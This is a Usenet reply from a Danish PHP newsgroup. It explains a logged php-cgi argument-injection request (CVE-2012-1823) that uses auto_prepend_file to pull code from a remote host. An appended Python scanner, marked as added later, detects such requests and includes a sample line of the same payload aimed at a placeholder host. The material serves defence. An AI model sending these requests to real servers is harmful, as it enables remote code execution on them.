


Re: Malicious request

Path csiph.com!eternal-september.org!feeder.eternal-september.org!reader01.eternal-september.org!.POSTED!not-for-mail
From Jan Hansen <jhjjhjhhansen@gmail.com>
Newsgroups dk.edb.internet.webdesign.serverside.php
Subject Re: Malicious request
Date Wed, 15 Apr 2020 14:19:06 +0200
Organization A noiseless patient Spider
Lines 25
Message-ID <20200415141906.726ca602f38e2a74861b5b75@gmail.com>
References <1tdp12me6kivq.dlg@lundhansen.dk>
Mime-Version 1.0
Content-Type text/plain; charset=UTF-8
Content-Transfer-Encoding 8bit
Injection-Info reader02.eternal-september.org; posting-host="6ecfaf4b687ddb4ed46085587d261ad3"; logging-data="3502"; mail-complaints-to="abuse@eternal-september.org"; posting-account="U2FsdGVkX18FQchpJDOdX79LiYgCfAZkGbxiUzgKBLQ="
User-Agent Sylfide for Fedora (sylpheed.sraoss.jp)
Cancel-Lock sha1:J88aXqdeIJUugmJPE+2+9DOsMDs=
X-Newsreader Sylpheed 3.7.0 (GTK+ 2.24.27; x86_64-unknown-linux-gnu)
Xref csiph.com dk.edb.internet.webdesign.serverside.php:7254



Bertel Lund Hansen wrote:

> I'm playing around with a bit of statistics on Fiduso's pages, and in
> that connection I read, among other things, $_SERVER['REQUEST_URI']. I
> wrote the data I found to a text file which I then intend to process
> with a statistics program.
> 
> The data file then contained the following request:
> /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp://tenderplus.spb.ru//components/com_foxcontact/default.txt

If you're running PHP 5.4.3 or newer on that domain, nothing comes of it.
From <https://www.cvedetails.com/cve/CVE-2012-1823>:
"sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, 
when configured as a CGI script (aka php-cgi), does not properly 
handle query strings that lack an = (equals sign) character, which 
allows remote attackers to execute arbitrary code by placing 
command-line options in the query string, related to lack of 
skipping a certain php_getopt for the 'd' case. ".



-- 
mvh Jan.
Help Microsoft stamp out piracy. Give
Linux to a friend today!
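The request Bertel logged has the shape the CVE text describes: the raw query string contains no literal `=` (the `=` signs are encoded as `%3d`) and its `+`-separated pieces all start with `-d`, so a vulnerable php-cgi would have parsed them as command-line options. That shape is easy to pick out of an access log after the fact. The following is an added example, not code from the thread: it takes combined-format access log lines (constructed here, with placeholder hosts and addresses), rebuilds the argv that php-cgi would have seen, and flags requests that smuggle php-cgi options. The function names and the log format are assumptions of this example.

```python
"""Flag requests shaped like php-cgi argument injection (CVE-2012-1823).

Added example, not from the newsgroup post. php-cgi before 5.3.12 / 5.4.2
treated a query string with no literal '=' as command-line arguments, so
'+'-separated tokens beginning with '-' were parsed as php-cgi options.
The log lines below are constructed; hosts and addresses are placeholders.
"""
import re
from urllib.parse import unquote, urlsplit

# Request field of a combined/common log line: "METHOD TARGET HTTP/x.y"
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# php-cgi options reachable through this bug: -d sets an ini directive,
# -s dumps the script source, -n / -c control which php.ini is loaded.
PHP_CGI_OPTS = ("-d", "-s", "-n", "-c")

# Constructed sample log (not real traffic).  Line 2 mirrors the request
# quoted in the thread with the remote host replaced by a placeholder.
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Apr/2020:09:01:02 +0200] "GET /index.php?page=about HTTP/1.1" 200 512',
    '192.0.2.99 - - [15/Apr/2020:09:01:07 +0200] "GET /index.php?-dsafe_mode%3dOff+'
    '-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+'
    '-dauto_prepend_file%3dhttp://attacker.example.invalid/default.txt HTTP/1.1" 200 77',
    '192.0.2.11 - - [15/Apr/2020:09:01:09 +0200] "GET /search.php?q=a+b HTTP/1.1" 200 1024',
    '192.0.2.12 - - [15/Apr/2020:09:01:11 +0200] "GET /index.php?debug HTTP/1.1" 200 512',
    '192.0.2.99 - - [15/Apr/2020:09:01:15 +0200] "GET /index.php?-s HTTP/1.1" 200 3071',
]


def php_cgi_argv_tokens(target: str) -> list[str]:
    """Return the argv a vulnerable php-cgi would have received for this
    request target, or [] when the query string would be treated as
    ordinary GET parameters (any literal '=' present)."""
    query = urlsplit(target).query
    if not query or "=" in query:
        return []
    # The CGI layer splits on '+' first and URL-decodes each piece, so an
    # encoded %3d only turns into '=' after the argv split has happened.
    return [unquote(tok) for tok in query.split("+") if tok]


def is_php_cgi_injection(target: str) -> bool:
    """True when at least one smuggled argv token is a php-cgi option."""
    return any(tok.startswith(PHP_CGI_OPTS) for tok in php_cgi_argv_tokens(target))


def ini_overrides(target: str) -> dict[str, str]:
    """Collect the -dNAME=VALUE directives a flagged request tries to set;
    auto_prepend_file pointing at a remote URL is the usual payload carrier."""
    out: dict[str, str] = {}
    for tok in php_cgi_argv_tokens(target):
        if tok.startswith("-d") and "=" in tok:
            name, _, value = tok[2:].partition("=")
            out[name] = value
    return out


def scan_log(lines: list[str]) -> list[tuple[str, dict[str, str]]]:
    """Return (target, ini_overrides) for every flagged request in the log."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if m and is_php_cgi_injection(m.group("target")):
            hits.append((m.group("target"), ini_overrides(m.group("target"))))
    return hits


if __name__ == "__main__":
    for target, overrides in scan_log(SAMPLE_LOG):
        print(target)
        for name, value in overrides.items():
            print(f"    {name} = {value}")
```

Note the two negatives: `/search.php?q=a+b` carries a literal `=`, so php-cgi never treats it as argv, and `/index.php?debug` has no `=` but no option-like token either, so a query consisting of a single bare word is not flagged. The detector is only triage for logs; as Jan says, the fix is a php-cgi release with the patch, since an upgraded interpreter simply ignores the injected options.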



Thread

Malicious request Bertel Lund Hansen <gadekryds@lundhansen.dk> - 2020-04-14 22:00 +0200
  Re: Malicious request Arne Vajhøj <arne@vajhoej.dk> - 2020-04-14 16:19 -0400
    Re: Malicious request Bertel Lund Hansen <gadekryds@lundhansen.dk> - 2020-04-15 09:13 +0200
      Re: Malicious request Martin Larsen <martin+spamfree+larsen@bigfoot.com> - 2020-04-15 10:16 +0200
      Re: Malicious request Arne Vajhøj <arne@vajhoej.dk> - 2020-04-15 08:30 -0400
        Re: Malicious request Bertel Lund Hansen <gadekryds@lundhansen.dk> - 2020-04-15 16:41 +0200
          Re: Malicious request Bertel Lund Hansen <gadekryds@lundhansen.dk> - 2020-04-15 16:43 +0200
  Re: Malicious request Jan Hansen <jhjjhjhhansen@gmail.com> - 2020-04-15 14:19 +0200
    Re: Malicious request Bertel Lund Hansen <gadekryds@lundhansen.dk> - 2020-04-15 16:38 +0200
